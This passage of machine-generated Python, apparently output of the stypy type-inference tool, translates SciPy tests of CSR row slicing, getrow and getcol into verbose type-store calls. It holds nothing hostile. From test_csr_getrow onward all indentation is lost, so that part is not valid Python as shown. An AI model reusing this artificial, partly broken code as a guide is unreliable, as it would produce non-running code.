    if is_error_type(arguments):
        # Destroy the current context
        module_type_store = module_type_store.close_function_context()
        return arguments
    # Initialize method data
    init_call_information(module_type_store, 'test_csr_rowslice', localization, [], arguments)
    # Default return type storage variable (SSA)
    # Assigning a type to the variable 'stypy_return_type'
    module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 0, 0), 'stypy_return_type', None)
    # ################# Begin of 'test_csr_rowslice(...)' code ##################
    # Assigning a Num to a Name (line 16):
    int_459696 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 16, 8), 'int')
    # Assigning a type to the variable 'N' (line 16)
    module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 16, 4), 'N', int_459696)
    # Call to seed(...): (line 17)
    # Processing the call arguments (line 17)
    int_459700 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 17, 19), 'int')
    # Processing the call keyword arguments (line 17)
    kwargs_459701 = {}
    # Getting the type of 'np' (line 17)
    np_459697 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 17, 4), 'np', False)
    # Obtaining the member 'random' of a type (line 17)
    random_459698 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 17, 4), np_459697, 'random')
    # Obtaining the member 'seed' of a type (line 17)
    seed_459699 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 17, 4), random_459698, 'seed')
    # Calling seed(args, kwargs) (line 17)
    seed_call_result_459702 = invoke(stypy.reporting.localization.Localization(__file__, 17, 4), seed_459699, *[int_459700], **kwargs_459701)
    # Assigning a Call to a Name (line 18):
    # Call to random(...): (line 18)
    # Processing the call arguments (line 18)
    # Obtaining an instance of the builtin type 'tuple' (line 18)
    tuple_459706 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 18, 26), 'tuple')
    # Adding type elements to the builtin type 'tuple' instance (line 18)
    # Adding element type (line 18)
    # Getting the type of 'N' (line 18)
    N_459707 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 18, 26), 'N', False)
    add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 18, 26), tuple_459706, N_459707)
    # Adding element type (line 18)
    # Getting the type of 'N' (line 18)
    N_459708 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 18, 29), 'N', False)
    add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 18, 26), tuple_459706, N_459708)
    # Processing the call keyword arguments (line 18)
    kwargs_459709 = {}
    # Getting the type of 'np' (line 18)
    np_459703 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 18, 8), 'np', False)
    # Obtaining the member 'random' of a type (line 18)
    random_459704 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 18, 8), np_459703, 'random')
    # Obtaining the member 'random' of a type (line 18)
    random_459705 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 18, 8), random_459704, 'random')
    # Calling random(args, kwargs) (line 18)
    random_call_result_459710 = invoke(stypy.reporting.localization.Localization(__file__, 18, 8), random_459705, *[tuple_459706], **kwargs_459709)
    # Assigning a type to the variable 'X' (line 18)
    module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 18, 4), 'X', random_call_result_459710)
    # Assigning a Num to a Subscript (line 19):
    int_459711 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 19, 17), 'int')
    # Getting the type of 'X' (line 19)
    X_459712 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 19, 4), 'X')
    # Getting the type of 'X' (line 19)
    X_459713 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 19, 6), 'X')
    float_459714 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 19, 10), 'float')
    # Applying the binary operator '>' (line 19)
    result_gt_459715 = python_operator(stypy.reporting.localization.Localization(__file__, 19, 6), '>', X_459713, float_459714)
    # Storing an element on a container (line 19)
    set_contained_elements_type(stypy.reporting.localization.Localization(__file__, 19, 4), X_459712, (result_gt_459715, int_459711))
    # Assigning a Call to a Name (line 20):
    # Call to csr_matrix(...): (line 20)
    # Processing the call arguments (line 20)
    # Getting the type of 'X' (line 20)
    X_459717 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 20, 22), 'X', False)
    # Processing the call keyword arguments (line 20)
    kwargs_459718 = {}
    # Getting the type of 'csr_matrix' (line 20)
    csr_matrix_459716 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 20, 11), 'csr_matrix', False)
    # Calling csr_matrix(args, kwargs) (line 20)
    csr_matrix_call_result_459719 = invoke(stypy.reporting.localization.Localization(__file__, 20, 11), csr_matrix_459716, *[X_459717], **kwargs_459718)
    # Assigning a type to the variable 'Xcsr' (line 20)
    module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 20, 4), 'Xcsr', csr_matrix_call_result_459719)
    # Assigning a List to a Name (line 22):
    # Obtaining an instance of the builtin type 'list' (line 22)
    list_459720 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 22, 13), 'list')
    # Adding type elements to the builtin type 'list' instance (line 22)
    # Adding element type (line 22)
    # Call to slice(...): (line 22)
    # Processing the call arguments (line 22)
    # Getting the type of 'None' (line 22)
    None_459722 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 22, 20), 'None', False)
    # Getting the type of 'None' (line 22)
    None_459723 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 22, 26), 'None', False)
    # Getting the type of 'None' (line 22)
    None_459724 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 22, 32), 'None', False)
    # Processing the call keyword arguments (line 22)
    kwargs_459725 = {}
    # Getting the type of 'slice' (line 22)
    slice_459721 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 22, 14), 'slice', False)
    # Calling slice(args, kwargs) (line 22)
    slice_call_result_459726 = invoke(stypy.reporting.localization.Localization(__file__, 22, 14), slice_459721, *[None_459722, None_459723, None_459724], **kwargs_459725)
    add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 13), list_459720, slice_call_result_459726)
    # Adding element type (line 22)
    # Call to slice(...): (line 23)
    # Processing the call arguments (line 23)
    # Getting the type of 'None' (line 23)
    None_459728 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 23, 20), 'None', False)
    # Getting the type of 'None' (line 23)
    None_459729 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 23, 26), 'None', False)
    int_459730 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 23, 32), 'int')
    # Processing the call keyword arguments (line 23)
    kwargs_459731 = {}
    # Getting the type of 'slice' (line 23)
    slice_459727 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 23, 14), 'slice', False)
    # Calling slice(args, kwargs) (line 23)
    slice_call_result_459732 = invoke(stypy.reporting.localization.Localization(__file__, 23, 14), slice_459727, *[None_459728, None_459729, int_459730], **kwargs_459731)
    add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 13), list_459720, slice_call_result_459732)
    # Adding element type (line 22)
    # Call to slice(...): (line 24)
    # Processing the call arguments (line 24)
    int_459734 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 24, 20), 'int')
    int_459735 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 24, 23), 'int')
    int_459736 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 24, 27), 'int')
    # Processing the call keyword arguments (line 24)
    kwargs_459737 = {}
    # Getting the type of 'slice' (line 24)
    slice_459733 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 24, 14), 'slice', False)
    # Calling slice(args, kwargs) (line 24)
    slice_call_result_459738 = invoke(stypy.reporting.localization.Localization(__file__, 24, 14), slice_459733, *[int_459734, int_459735, int_459736], **kwargs_459737)
    add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 13), list_459720, slice_call_result_459738)
    # Adding element type (line 22)
    # Call to slice(...): (line 25)
    # Processing the call arguments (line 25)
    int_459740 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 25, 20), 'int')
    int_459741 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 25, 24), 'int')
    int_459742 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 25, 27), 'int')
    # Processing the call keyword arguments (line 25)
    kwargs_459743 = {}
    # Getting the type of 'slice' (line 25)
    slice_459739 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 25, 14), 'slice', False)
    # Calling slice(args, kwargs) (line 25)
    slice_call_result_459744 = invoke(stypy.reporting.localization.Localization(__file__, 25, 14), slice_459739, *[int_459740, int_459741, int_459742], **kwargs_459743)
    add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 22, 13), list_459720, slice_call_result_459744)
    # Assigning a type to the variable 'slices' (line 22)
    module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 22, 4), 'slices', list_459720)
    # Call to range(...): (line 27)
    # Processing the call arguments (line 27)
    # Getting the type of 'N' (line 27)
    N_459746 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 27, 19), 'N', False)
    # Processing the call keyword arguments (line 27)
    kwargs_459747 = {}
    # Getting the type of 'range' (line 27)
    range_459745 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 27, 13), 'range', False)
    # Calling range(args, kwargs) (line 27)
    range_call_result_459748 = invoke(stypy.reporting.localization.Localization(__file__, 27, 13), range_459745, *[N_459746], **kwargs_459747)
    # Testing the type of a for loop iterable (line 27)
    is_suitable_for_loop_condition(stypy.reporting.localization.Localization(__file__, 27, 4), range_call_result_459748)
    # Getting the type of the for loop variable (line 27)
    for_loop_var_459749 = get_type_of_for_loop_variable(stypy.reporting.localization.Localization(__file__, 27, 4), range_call_result_459748)
    # Assigning a type to the variable 'i' (line 27)
    module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 27, 4), 'i', for_loop_var_459749)
    # SSA begins for a for statement (line 27)
    module_type_store = SSAContext.create_ssa_context(module_type_store, 'for loop')
    # Getting the type of 'slices' (line 28)
    slices_459750 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 28, 18), 'slices')
    # Testing the type of a for loop iterable (line 28)
    is_suitable_for_loop_condition(stypy.reporting.localization.Localization(__file__, 28, 8), slices_459750)
    # Getting the type of the for loop variable (line 28)
    for_loop_var_459751 = get_type_of_for_loop_variable(stypy.reporting.localization.Localization(__file__, 28, 8), slices_459750)
    # Assigning a type to the variable 'sl' (line 28)
    module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 28, 8), 'sl', for_loop_var_459751)
    # SSA begins for a for statement (line 28)
    module_type_store = SSAContext.create_ssa_context(module_type_store, 'for loop')
    # Call to _check_csr_rowslice(...): (line 29)
    # Processing the call arguments (line 29)
    # Getting the type of 'i' (line 29)
    i_459753 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 29, 32), 'i', False)
    # Getting the type of 'sl' (line 29)
    sl_459754 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 29, 35), 'sl', False)
    # Getting the type of 'X' (line 29)
    X_459755 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 29, 39), 'X', False)
    # Getting the type of 'Xcsr' (line 29)
    Xcsr_459756 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 29, 42), 'Xcsr', False)
    # Processing the call keyword arguments (line 29)
    kwargs_459757 = {}
    # Getting the type of '_check_csr_rowslice' (line 29)
    _check_csr_rowslice_459752 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 29, 12), '_check_csr_rowslice', False)
    # Calling _check_csr_rowslice(args, kwargs) (line 29)
    _check_csr_rowslice_call_result_459758 = invoke(stypy.reporting.localization.Localization(__file__, 29, 12), _check_csr_rowslice_459752, *[i_459753, sl_459754, X_459755, Xcsr_459756], **kwargs_459757)
    # SSA join for a for statement
    module_type_store = module_type_store.join_ssa_context()
    # SSA join for a for statement
    module_type_store = module_type_store.join_ssa_context()
    # ################# End of 'test_csr_rowslice(...)' code ##################
    # Teardown call information
    teardown_call_information(localization, arguments)
    # Storing the return type of function 'test_csr_rowslice' in the type store
    # Getting the type of 'stypy_return_type' (line 15)
    stypy_return_type_459759 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 15, 0), 'stypy_return_type')
    module_type_store.store_return_type_of_current_context(stypy_return_type_459759)
    # Destroy the current context
    module_type_store = module_type_store.close_function_context()
    # Return type of the function 'test_csr_rowslice'
    return stypy_return_type_459759

# Assigning a type to the variable 'test_csr_rowslice' (line 15)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 15, 0), 'test_csr_rowslice', test_csr_rowslice)
@norecursion
def test_csr_getrow(localization, *varargs, **kwargs):
global module_type_store
# Assign values to the parameters with defaults
defaults = []
# Create a new context for function 'test_csr_getrow'
module_type_store = module_type_store.open_function_context('test_csr_getrow', 32, 0, False)
# Passed parameters checking function
test_csr_getrow.stypy_localization = localization
test_csr_getrow.stypy_type_of_self = None
test_csr_getrow.stypy_type_store = module_type_store
test_csr_getrow.stypy_function_name = 'test_csr_getrow'
test_csr_getrow.stypy_param_names_list = []
test_csr_getrow.stypy_varargs_param_name = None
test_csr_getrow.stypy_kwargs_param_name = None
test_csr_getrow.stypy_call_defaults = defaults
test_csr_getrow.stypy_call_varargs = varargs
test_csr_getrow.stypy_call_kwargs = kwargs
arguments = process_argument_values(localization, None, module_type_store, 'test_csr_getrow', [], None, None, defaults, varargs, kwargs)
if is_error_type(arguments):
# Destroy the current context
module_type_store = module_type_store.close_function_context()
return arguments
# Initialize method data
init_call_information(module_type_store, 'test_csr_getrow', localization, [], arguments)
# Default return type storage variable (SSA)
# Assigning a type to the variable 'stypy_return_type'
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 0, 0), 'stypy_return_type', None)
# ################# Begin of 'test_csr_getrow(...)' code ##################
# Assigning a Num to a Name (line 33):
int_459760 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 33, 8), 'int')
# Assigning a type to the variable 'N' (line 33)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 33, 4), 'N', int_459760)
# Call to seed(...): (line 34)
# Processing the call arguments (line 34)
int_459764 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 34, 19), 'int')
# Processing the call keyword arguments (line 34)
kwargs_459765 = {}
# Getting the type of 'np' (line 34)
np_459761 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 34, 4), 'np', False)
# Obtaining the member 'random' of a type (line 34)
random_459762 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 34, 4), np_459761, 'random')
# Obtaining the member 'seed' of a type (line 34)
seed_459763 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 34, 4), random_459762, 'seed')
# Calling seed(args, kwargs) (line 34)
seed_call_result_459766 = invoke(stypy.reporting.localization.Localization(__file__, 34, 4), seed_459763, *[int_459764], **kwargs_459765)
# Assigning a Call to a Name (line 35):
# Call to random(...): (line 35)
# Processing the call arguments (line 35)
# Obtaining an instance of the builtin type 'tuple' (line 35)
tuple_459770 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 35, 26), 'tuple')
# Adding type elements to the builtin type 'tuple' instance (line 35)
# Adding element type (line 35)
# Getting the type of 'N' (line 35)
N_459771 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 35, 26), 'N', False)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 35, 26), tuple_459770, N_459771)
# Adding element type (line 35)
# Getting the type of 'N' (line 35)
N_459772 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 35, 29), 'N', False)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 35, 26), tuple_459770, N_459772)
# Processing the call keyword arguments (line 35)
kwargs_459773 = {}
# Getting the type of 'np' (line 35)
np_459767 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 35, 8), 'np', False)
# Obtaining the member 'random' of a type (line 35)
random_459768 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 35, 8), np_459767, 'random')
# Obtaining the member 'random' of a type (line 35)
random_459769 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 35, 8), random_459768, 'random')
# Calling random(args, kwargs) (line 35)
random_call_result_459774 = invoke(stypy.reporting.localization.Localization(__file__, 35, 8), random_459769, *[tuple_459770], **kwargs_459773)
# Assigning a type to the variable 'X' (line 35)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 35, 4), 'X', random_call_result_459774)
# Assigning a Num to a Subscript (line 36):
int_459775 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 36, 17), 'int')
# Getting the type of 'X' (line 36)
X_459776 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 36, 4), 'X')
# Getting the type of 'X' (line 36)
X_459777 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 36, 6), 'X')
float_459778 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 36, 10), 'float')
# Applying the binary operator '>' (line 36)
result_gt_459779 = python_operator(stypy.reporting.localization.Localization(__file__, 36, 6), '>', X_459777, float_459778)
# Storing an element on a container (line 36)
set_contained_elements_type(stypy.reporting.localization.Localization(__file__, 36, 4), X_459776, (result_gt_459779, int_459775))
# Assigning a Call to a Name (line 37):
# Call to csr_matrix(...): (line 37)
# Processing the call arguments (line 37)
# Getting the type of 'X' (line 37)
X_459781 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 37, 22), 'X', False)
# Processing the call keyword arguments (line 37)
kwargs_459782 = {}
# Getting the type of 'csr_matrix' (line 37)
csr_matrix_459780 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 37, 11), 'csr_matrix', False)
# Calling csr_matrix(args, kwargs) (line 37)
csr_matrix_call_result_459783 = invoke(stypy.reporting.localization.Localization(__file__, 37, 11), csr_matrix_459780, *[X_459781], **kwargs_459782)
# Assigning a type to the variable 'Xcsr' (line 37)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 37, 4), 'Xcsr', csr_matrix_call_result_459783)
# Call to range(...): (line 39)
# Processing the call arguments (line 39)
# Getting the type of 'N' (line 39)
N_459785 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 39, 19), 'N', False)
# Processing the call keyword arguments (line 39)
kwargs_459786 = {}
# Getting the type of 'range' (line 39)
range_459784 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 39, 13), 'range', False)
# Calling range(args, kwargs) (line 39)
range_call_result_459787 = invoke(stypy.reporting.localization.Localization(__file__, 39, 13), range_459784, *[N_459785], **kwargs_459786)
# Testing the type of a for loop iterable (line 39)
is_suitable_for_loop_condition(stypy.reporting.localization.Localization(__file__, 39, 4), range_call_result_459787)
# Getting the type of the for loop variable (line 39)
for_loop_var_459788 = get_type_of_for_loop_variable(stypy.reporting.localization.Localization(__file__, 39, 4), range_call_result_459787)
# Assigning a type to the variable 'i' (line 39)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 39, 4), 'i', for_loop_var_459788)
# SSA begins for a for statement (line 39)
module_type_store = SSAContext.create_ssa_context(module_type_store, 'for loop')
# Assigning a Subscript to a Name (line 40):
# Obtaining the type of the subscript
# Getting the type of 'i' (line 40)
i_459789 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 40, 20), 'i')
# Getting the type of 'i' (line 40)
i_459790 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 40, 22), 'i')
int_459791 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 40, 26), 'int')
# Applying the binary operator '+' (line 40)
result_add_459792 = python_operator(stypy.reporting.localization.Localization(__file__, 40, 22), '+', i_459790, int_459791)
slice_459793 = ensure_slice_bounds(stypy.reporting.localization.Localization(__file__, 40, 18), i_459789, result_add_459792, None)
slice_459794 = ensure_slice_bounds(stypy.reporting.localization.Localization(__file__, 40, 18), None, None, None)
# Getting the type of 'X' (line 40)
X_459795 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 40, 18), 'X')
# Obtaining the member '__getitem__' of a type (line 40)
getitem___459796 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 40, 18), X_459795, '__getitem__')
# Calling the subscript (__getitem__) to obtain the elements type (line 40)
subscript_call_result_459797 = invoke(stypy.reporting.localization.Localization(__file__, 40, 18), getitem___459796, (slice_459793, slice_459794))
# Assigning a type to the variable 'arr_row' (line 40)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 40, 8), 'arr_row', subscript_call_result_459797)
# Assigning a Call to a Name (line 41):
# Call to getrow(...): (line 41)
# Processing the call arguments (line 41)
# Getting the type of 'i' (line 41)
i_459800 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 41, 30), 'i', False)
# Processing the call keyword arguments (line 41)
kwargs_459801 = {}
# Getting the type of 'Xcsr' (line 41)
Xcsr_459798 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 41, 18), 'Xcsr', False)
# Obtaining the member 'getrow' of a type (line 41)
getrow_459799 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 41, 18), Xcsr_459798, 'getrow')
# Calling getrow(args, kwargs) (line 41)
getrow_call_result_459802 = invoke(stypy.reporting.localization.Localization(__file__, 41, 18), getrow_459799, *[i_459800], **kwargs_459801)
# Assigning a type to the variable 'csr_row' (line 41)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 41, 8), 'csr_row', getrow_call_result_459802)
# Call to assert_array_almost_equal(...): (line 43)
# Processing the call arguments (line 43)
# Getting the type of 'arr_row' (line 43)
arr_row_459804 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 43, 34), 'arr_row', False)
# Call to toarray(...): (line 43)
# Processing the call keyword arguments (line 43)
kwargs_459807 = {}
# Getting the type of 'csr_row' (line 43)
csr_row_459805 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 43, 43), 'csr_row', False)
# Obtaining the member 'toarray' of a type (line 43)
toarray_459806 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 43, 43), csr_row_459805, 'toarray')
# Calling toarray(args, kwargs) (line 43)
toarray_call_result_459808 = invoke(stypy.reporting.localization.Localization(__file__, 43, 43), toarray_459806, *[], **kwargs_459807)
# Processing the call keyword arguments (line 43)
kwargs_459809 = {}
# Getting the type of 'assert_array_almost_equal' (line 43)
assert_array_almost_equal_459803 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 43, 8), 'assert_array_almost_equal', False)
# Calling assert_array_almost_equal(args, kwargs) (line 43)
assert_array_almost_equal_call_result_459810 = invoke(stypy.reporting.localization.Localization(__file__, 43, 8), assert_array_almost_equal_459803, *[arr_row_459804, toarray_call_result_459808], **kwargs_459809)
# Call to assert_(...): (line 44)
# Processing the call arguments (line 44)
# Call to type(...): (line 44)
# Processing the call arguments (line 44)
# Getting the type of 'csr_row' (line 44)
csr_row_459813 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 44, 21), 'csr_row', False)
# Processing the call keyword arguments (line 44)
kwargs_459814 = {}
# Getting the type of 'type' (line 44)
type_459812 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 44, 16), 'type', False)
# Calling type(args, kwargs) (line 44)
type_call_result_459815 = invoke(stypy.reporting.localization.Localization(__file__, 44, 16), type_459812, *[csr_row_459813], **kwargs_459814)
# Getting the type of 'csr_matrix' (line 44)
csr_matrix_459816 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 44, 33), 'csr_matrix', False)
# Applying the binary operator 'is' (line 44)
result_is__459817 = python_operator(stypy.reporting.localization.Localization(__file__, 44, 16), 'is', type_call_result_459815, csr_matrix_459816)
# Processing the call keyword arguments (line 44)
kwargs_459818 = {}
# Getting the type of 'assert_' (line 44)
assert__459811 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 44, 8), 'assert_', False)
# Calling assert_(args, kwargs) (line 44)
assert__call_result_459819 = invoke(stypy.reporting.localization.Localization(__file__, 44, 8), assert__459811, *[result_is__459817], **kwargs_459818)
# SSA join for a for statement
module_type_store = module_type_store.join_ssa_context()
# ################# End of 'test_csr_getrow(...)' code ##################
# Teardown call information
teardown_call_information(localization, arguments)
# Storing the return type of function 'test_csr_getrow' in the type store
# Getting the type of 'stypy_return_type' (line 32)
stypy_return_type_459820 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 32, 0), 'stypy_return_type')
module_type_store.store_return_type_of_current_context(stypy_return_type_459820)
# Destroy the current context
module_type_store = module_type_store.close_function_context()
# Return type of the function 'test_csr_getrow'
return stypy_return_type_459820
# Assigning a type to the variable 'test_csr_getrow' (line 32)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 32, 0), 'test_csr_getrow', test_csr_getrow)
@norecursion
def test_csr_getcol(localization, *varargs, **kwargs):
global module_type_store
# Assign values to the parameters with defaults
defaults = []
# Create a new context for function 'test_csr_getcol'
module_type_store = module_type_store.open_function_context('test_csr_getcol', 47, 0, False)
# Passed parameters checking function
test_csr_getcol.stypy_localization = localization
test_csr_getcol.stypy_type_of_self = None
test_csr_getcol.stypy_type_store = module_type_store
test_csr_getcol.stypy_function_name = 'test_csr_getcol'
test_csr_getcol.stypy_param_names_list = []
test_csr_getcol.stypy_varargs_param_name = None
test_csr_getcol.stypy_kwargs_param_name = None
test_csr_getcol.stypy_call_defaults = defaults
test_csr_getcol.stypy_call_varargs = varargs
test_csr_getcol.stypy_call_kwargs = kwargs
arguments = process_argument_values(localization, None, module_type_store, 'test_csr_getcol', [], None, None, defaults, varargs, kwargs)
if is_error_type(arguments):
# Destroy the current context
module_type_store = module_type_store.close_function_context()
return arguments
# Initialize method data
init_call_information(module_type_store, 'test_csr_getcol', localization, [], arguments)
# Default return type storage variable (SSA)
# Assigning a type to the variable 'stypy_return_type'
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 0, 0), 'stypy_return_type', None)
# ################# Begin of 'test_csr_getcol(...)' code ##################
# Assigning a Num to a Name (line 48):
int_459821 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 48, 8), 'int')
# Assigning a type to the variable 'N' (line 48)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 48, 4), 'N', int_459821)
# Call to seed(...): (line 49)
# Processing the call arguments (line 49)
int_459825 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 49, 19), 'int')
# Processing the call keyword arguments (line 49)
kwargs_459826 = {}
# Getting the type of 'np' (line 49)
np_459822 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 49, 4), 'np', False)
# Obtaining the member 'random' of a type (line 49)
random_459823 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 49, 4), np_459822, 'random')
# Obtaining the member 'seed' of a type (line 49)
seed_459824 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 49, 4), random_459823, 'seed')
# Calling seed(args, kwargs) (line 49)
seed_call_result_459827 = invoke(stypy.reporting.localization.Localization(__file__, 49, 4), seed_459824, *[int_459825], **kwargs_459826)
# Assigning a Call to a Name (line 50):
# Call to random(...): (line 50)
# Processing the call arguments (line 50)
# Obtaining an instance of the builtin type 'tuple' (line 50)
tuple_459831 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 50, 26), 'tuple')
# Adding type elements to the builtin type 'tuple' instance (line 50)
# Adding element type (line 50)
# Getting the type of 'N' (line 50)
N_459832 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 50, 26), 'N', False)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 50, 26), tuple_459831, N_459832)
# Adding element type (line 50)
# Getting the type of 'N' (line 50)
N_459833 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 50, 29), 'N', False)
add_contained_elements_type(stypy.reporting.localization.Localization(__file__, 50, 26), tuple_459831, N_459833)
# Processing the call keyword arguments (line 50)
kwargs_459834 = {}
# Getting the type of 'np' (line 50)
np_459828 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 50, 8), 'np', False)
# Obtaining the member 'random' of a type (line 50)
random_459829 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 50, 8), np_459828, 'random')
# Obtaining the member 'random' of a type (line 50)
random_459830 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 50, 8), random_459829, 'random')
# Calling random(args, kwargs) (line 50)
random_call_result_459835 = invoke(stypy.reporting.localization.Localization(__file__, 50, 8), random_459830, *[tuple_459831], **kwargs_459834)
# Assigning a type to the variable 'X' (line 50)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 50, 4), 'X', random_call_result_459835)
# Assigning a Num to a Subscript (line 51):
int_459836 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 51, 17), 'int')
# Getting the type of 'X' (line 51)
X_459837 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 51, 4), 'X')
# Getting the type of 'X' (line 51)
X_459838 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 51, 6), 'X')
float_459839 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 51, 10), 'float')
# Applying the binary operator '>' (line 51)
result_gt_459840 = python_operator(stypy.reporting.localization.Localization(__file__, 51, 6), '>', X_459838, float_459839)
# Storing an element on a container (line 51)
set_contained_elements_type(stypy.reporting.localization.Localization(__file__, 51, 4), X_459837, (result_gt_459840, int_459836))
# Assigning a Call to a Name (line 52):
# Call to csr_matrix(...): (line 52)
